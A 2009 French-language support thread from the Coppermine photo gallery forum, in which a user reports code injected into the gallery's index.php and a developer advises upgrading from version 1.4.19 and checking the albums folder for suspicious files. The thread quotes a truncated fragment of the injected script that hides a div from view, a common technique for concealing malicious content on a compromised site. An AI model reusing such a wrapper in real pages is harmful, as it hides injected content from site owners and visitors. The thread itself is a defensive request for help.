Injection de code dans ma galerie... Injection de code dans ma galerie...
 

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Main Menu

Injection de code dans ma galerie...

Started by panatan, February 19, 2009, 03:41:49 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

panatan

Bonjour,

Je viens de découvrir qu'un code avait été injecté dans ma galerie, voici un extrait (le code est beaucoup plus long...

<div id='sihanw'><script>b='hid';c='den';d=0;a=document.getElementById('sihanw');if(a){a.style.position='absolute';a.style.height=d+'px';a.style.overflow=b+c;}  .....   etc .....</script><!--<</div>

Est-ce une faille connue et les maj permettent-t-elles de résoudre ce problème ?

Merci pour votre aide.


François Keller

il est difficile de dire si le code vient d'une faille récente ou non de coppermine avec le peu d'indications que nous sont données.
Quelle version de coppermine utilisez vous
le code se trouve dans quels fichiers ?
Y at'il beaucoup de fichiers concernés.
Mais de toute façon, une mise à jour s'impose puisqu'a chaque fois elle permets de corriger des failles de sécurités découvertes...
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

panatan

Je crois qu'il s'agit de l'avant dernière version (pas sûr car je n'arrive plus à me connecter à l'admin...)

Le code n'a été ajouté qu'au niveau de l'index.php

François Keller

si le site est celui qui est accessible depuis l'icone de ton profil, il est en version 1.4.19. (pas besoin d'accéder à l'administration pour le voir)
Il est indispensable de faire une mise à jour et de vérifier qu'il n'y a pas de fichier avec un  nom bizarre dans le répertoire albums.
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

panatan